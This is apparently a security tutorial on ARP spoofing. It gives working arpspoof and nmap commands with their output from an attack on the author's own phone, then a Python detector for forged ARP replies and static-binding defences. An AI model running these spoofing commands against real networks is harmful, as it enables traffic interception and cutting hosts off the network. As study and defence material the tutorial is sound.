ARP Attacks and Spoofing in Practice

ARP (Address Resolution Protocol) is a protocol at the network layer of the TCP/IP stack that resolves an IP address to the corresponding MAC address.

How an ARP attack works

By forging IP-to-MAC address mappings, the attacker prevents the network from communicating normally.

How ARP spoofing works

The spoofing source disguises itself as the gateway (or as another host) and sends ARP reply packets to target hosts on the LAN. The hosts on the LAN then mistake the spoofing source's MAC address for the MAC address of the gateway (or of the other host), and all traffic originally bound for the gateway (or the other host) is sent to the spoofing source instead.


Carrying out ARP spoofing

1. Install the arpspoof tool

sudo apt-get install dsniff

Syntax
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

Parameters
-i interface   Specify the interface to use.
-c own|host|both   Specify the scope: own|host|both (self | host | both).
-t target   Specify a particular host to ARP-poison (if not specified, all hosts on the LAN).
-r   Poison both hosts (host and target) to capture traffic in both directions (only valid together with -t).
host   Specify the host whose packets you want to intercept (usually the local gateway).

Example
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

192.168.1.100 is the IP address of the target; 192.168.1.1 is the target's gateway.

2. Enable IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

3. Check the attacking machine's IP address and ARP cache

Check the IP address:

root@kali:/home/sknife# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.105  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 fe80::20c:29ff:fe3f:1aea  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:3f:1a:ea  txqueuelen 1000  (Ethernet)
        RX packets 161798  bytes 139527686 (133.0 MiB)
        RX errors 0  dropped 10  overruns 0  frame 0
        TX packets 66839  bytes 16672614 (15.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 229  bytes 12275 (11.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 229  bytes 12275 (11.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Note: the attacking machine's network connection is in bridged mode (it must be on the same LAN as the target machine).

View the ARP cache:

root@kali:/home/sknife# arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.101            ether   e4:a7:c5:43:ab:b1   C                     eth0
192.168.0.103            ether   e4:34:93:d3:7c:26   C                     eth0
192.168.0.104            ether   30:24:32:e7:df:a6   C                     eth0
192.168.0.100            ether   dc:72:9b:de:36:ad   C                     eth0
192.168.0.102            ether   68:27:37:40:70:ce   C                     eth0
192.168.0.1              ether   f4:83:cd:00:99:a7   C                     eth0

Note: 192.168.0.1 is the gateway; all the other entries are hosts.

4. Locate the target machine

Scan host 192.168.0.100 with nmap

root@kali:/home/sknife# nmap -O 192.168.0.100
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-30 17:54 CST
Nmap scan report for 192.168.0.100
Host is up (0.026s latency).
Not shown: 999 closed ports
PORT      STATE    SERVICE
16080/tcp filtered osxwebadmin
MAC Address: DC:72:9B:DE:36:AD (Huawei Technologies)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.04 seconds

This shows that the host is the author's Huawei phone.

Note: the IP address can also be read directly from the phone's network status screen.

5. Start the attack

Run the following command on the attacking machine:

root@kali:/home/sknife# arpspoof -i eth0 -t 192.168.0.100 192.168.0.1
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea
0:c:29:3f:1a:ea dc:72:9b:de:36:ad 0806 42: arp reply 192.168.0.1 is-at 0:c:29:3f:1a:ea

The output shows the attacking machine sending ARP reply packets to the target host, telling it that the gateway's MAC address is 00:0c:29:3f:1a:ea (the attacking machine's MAC address). At this point the ARP spoof has succeeded and the phone can no longer reach the network.


Defending against ARP spoofing

Bind IP addresses to MAC addresses in the router.
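The following is an added example, not code from the original article, showing how a host-side ARP watcher (the software counterpart of the router-side IP-MAC binding above) can catch the forged replies shown in step 5. It parses raw Ethernet/ARP frames the way a capture tool would hand them over and compares every reply's "is-at" claim against a trusted binding table. The table and the two constructed sample frames reuse the addresses from the article's own arp cache and arpspoof output (gateway 192.168.0.1 at f4:83:cd:00:99:a7, attacking machine MAC 00:0c:29:3f:1a:ea, phone MAC dc:72:9b:de:36:ad). The helper build_arp_frame exists only to construct that sample capture in memory; nothing is sent on the wire.

```python
"""Detect ARP replies that contradict a trusted IP-to-MAC binding table.

Added example (not from the original article). It mimics what a host-based
ARP watcher does: parse raw Ethernet II + ARP frames as captured off the
wire and compare each reply's "is-at" claim against known bindings.
"""
import struct
from ipaddress import IPv4Address

ETH_TYPE_ARP = 0x0806   # EtherType for ARP, the "0806" seen in arpspoof's output
ARP_REPLY = 2           # ARP opcode 2 = reply ("is-at")


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def parse_arp_frame(frame):
    """Parse a 42-byte Ethernet II + ARP frame; return a dict, or None if not IPv4 ARP."""
    if len(frame) < 42:
        return None
    dst, src, eth_type = struct.unpack("!6s6sH", frame[:14])
    if eth_type != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {
        "eth_src": mac_str(src), "eth_dst": mac_str(dst), "op": op,
        "sender_mac": mac_str(sha), "sender_ip": str(IPv4Address(spa)),
        "target_mac": mac_str(tha), "target_ip": str(IPv4Address(tpa)),
    }


def build_arp_frame(op, eth_src, eth_dst, sha, spa, tha, tpa):
    """Build an in-memory frame for the constructed sample capture only."""
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(eth_src), ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sha), IPv4Address(spa).packed,
                      mac_bytes(tha), IPv4Address(tpa).packed)
    return eth + arp


# Trusted bindings taken from the article's ARP cache listing (step 3). The gateway
# entry is the one an attacker has to overwrite to get into the traffic path.
TRUSTED_BINDINGS = {
    "192.168.0.1": "f4:83:cd:00:99:a7",
    "192.168.0.100": "dc:72:9b:de:36:ad",
}


def check_arp_reply(info, bindings=TRUSTED_BINDINGS):
    """Return an alert string for a suspicious ARP reply, else None."""
    if info is None or info["op"] != ARP_REPLY:
        return None
    ip, claimed = info["sender_ip"], info["sender_mac"]
    expected = bindings.get(ip)
    if expected is not None and claimed != expected:
        return f"ARP spoof suspected: {ip} claimed at {claimed}, bound to {expected}"
    # A reply whose Ethernet source differs from the ARP sender MAC is also odd.
    if info["eth_src"] != claimed:
        return f"ARP header mismatch: frame from {info['eth_src']} claims sender {claimed}"
    return None


def scan_frames(frames, bindings=TRUSTED_BINDINGS):
    """Run every frame through the checker and collect the alerts."""
    return [a for a in (check_arp_reply(parse_arp_frame(f), bindings) for f in frames) if a]


# Constructed sample capture: a genuine reply from the gateway, followed by a forged
# reply of the kind arpspoof emits in step 5 (gateway IP claimed at the attacker MAC).
SAMPLE_FRAMES = [
    build_arp_frame(ARP_REPLY, "f4:83:cd:00:99:a7", "dc:72:9b:de:36:ad",
                    "f4:83:cd:00:99:a7", "192.168.0.1",
                    "dc:72:9b:de:36:ad", "192.168.0.100"),
    build_arp_frame(ARP_REPLY, "00:0c:29:3f:1a:ea", "dc:72:9b:de:36:ad",
                    "00:0c:29:3f:1a:ea", "192.168.0.1",
                    "dc:72:9b:de:36:ad", "192.168.0.100"),
]

if __name__ == "__main__":
    for alert in scan_frames(SAMPLE_FRAMES):
        print(alert)
```

Run as-is, it prints one alert for the forged reply and nothing for the genuine one. In a real deployment the frames would come from a raw socket or a pcap file, and the binding table would be seeded from a verified arp listing like the one in step 3. The same binding can also be pinned on the client itself with a static ARP entry (arp -s 192.168.0.1 f4:83:cd:00:99:a7, or ip neigh replace 192.168.0.1 lladdr f4:83:cd:00:99:a7 dev eth0 nud permanent), which is the host-side counterpart of binding in the router.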


Disclaimer

This article is intended only for network security enthusiasts to study and discuss; do not use it for illegal activities.
